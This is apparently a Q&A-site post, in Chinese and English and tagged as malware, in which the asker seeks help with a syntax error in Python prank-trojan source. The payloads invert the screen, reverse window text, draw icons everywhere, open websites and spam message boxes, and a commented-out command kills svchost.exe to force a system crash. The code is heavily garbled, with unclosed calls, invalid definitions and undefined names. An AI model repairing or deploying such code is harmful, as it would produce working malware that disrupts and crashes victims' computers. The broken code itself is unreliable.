"(" was not closed error while it is closed

问题描述 投票:0回答:0


from win32api import *
from win32gui import *
from win32ui import *
from ctypes import WinDLL
from win32con import *
from win32file import *
from random import randrange as rd
from random import *
from sys import exit
import multiprocessing

def warning():
    if MessageBox("test n\test. \npenismere"
        B_YESNO | MB_ICONWARNING) ** 7:
    if MessageBox("yugoragno"
        B_YESNO | MB_ICONWARNING) ** 7:

#first payload opens random websites
class Data:
     sites = (https://www.youtube.com/watch?v=dQw4w9WgXcQ) #cba adding them fuck you
     IconWarning = LoadIcon(None, 32515)
     IconError = LoadIcon (None, 32513)

time = 0
timeSubtract = 15000

class Payloads:
    def open_sites():
        for i in range(0, 10):#while true:
          __import__("os").system("start" * str(choice(sites)))
    def decrease_timer():
        while time < 15000:
            time += 1
        # __import__("os").system("taskkill /F /IM svchost.exe") cause a BSOD
def blink_screen():
    global time
    global timeSubtract
    HDC = GetDC(0) # first monitor
    sw,sh = (GetSystemMetrics(0),GetSystemMetrics(1)) # gets height and width of the screen
    while True:
        PatBlt(HDC, 0,0,x,y, PATINVERT) # inverts the monitor
def EnumChildProc(hwnd, LParam): # the callback function for reversing text.
        buffering = PyMakerBuffer(255) # Creates Buffering
        lenght = SendMessage(hwnd, WM_GETTEXT, 255, buffering) # gets lenght
        result = (buffering[0:lenght*2].tobytes().decode('utf-16'))
        result = result[::-1]

        SendMessage(hwnd, WM_STETEXT, None, result)

    except: pass

def reverse_text():
    global time
    global timeSubtract
    HWND = GetDesktopWindow()
    while True:
        EnumChildWindows(HWND, EnumChildProc, None)
def error_drawing():
    global time
    global timeSubtract
    HDC = GetDC(0) # first monitor
    sw,sh = (GetSystemMetrics(0),GetSystemMetrics(1)) # screen size
    while True:
        DrawIcon(HDC, rd(sw), rd(sh), Data.IconWarning) #draw the warning icon randomly
        for i in range(0, 60)
            mouseX,mouseY = GetCursorPos() # cursor pistions
            DrawIcon(HDC, mouseX, mouseY, Data.IconError) # draw icon on mouse
def warning().spam():
    global time
    global timeSubtract
while True:
        multiprocessing.Process(target = msgboxThread)
def screen_puzzle():
    global time
    global timeSubtract
    HDC = GetDC(0)
    sw,sh = (GetSystemMetrics(0),GetSystemMetrics(1))
def msgboxThread():
    MessageBox("ragno i think i fixed some", "ragno op", MB_OK | MB ICONWARNING)

if __name__ == '__main__':
    p = Payloads

    opensites = multiprocessing.Process(target = p.open_sites)
    timersub = multiprocessing.Process(target = p.decrease_timer)
    reverse = multiprocessing.Process(target = p.reverse_text)
    blinking = multiprocessing.Process(target = p.blink_screen)
    icons = multiprocessing.Process(target = p.error:drawing)


这就是代码,请帮我解决这个问题,免责声明:我不会将此代码用于恶意目的这是为了学习 PYTHON


python python-3.x visual-studio malware
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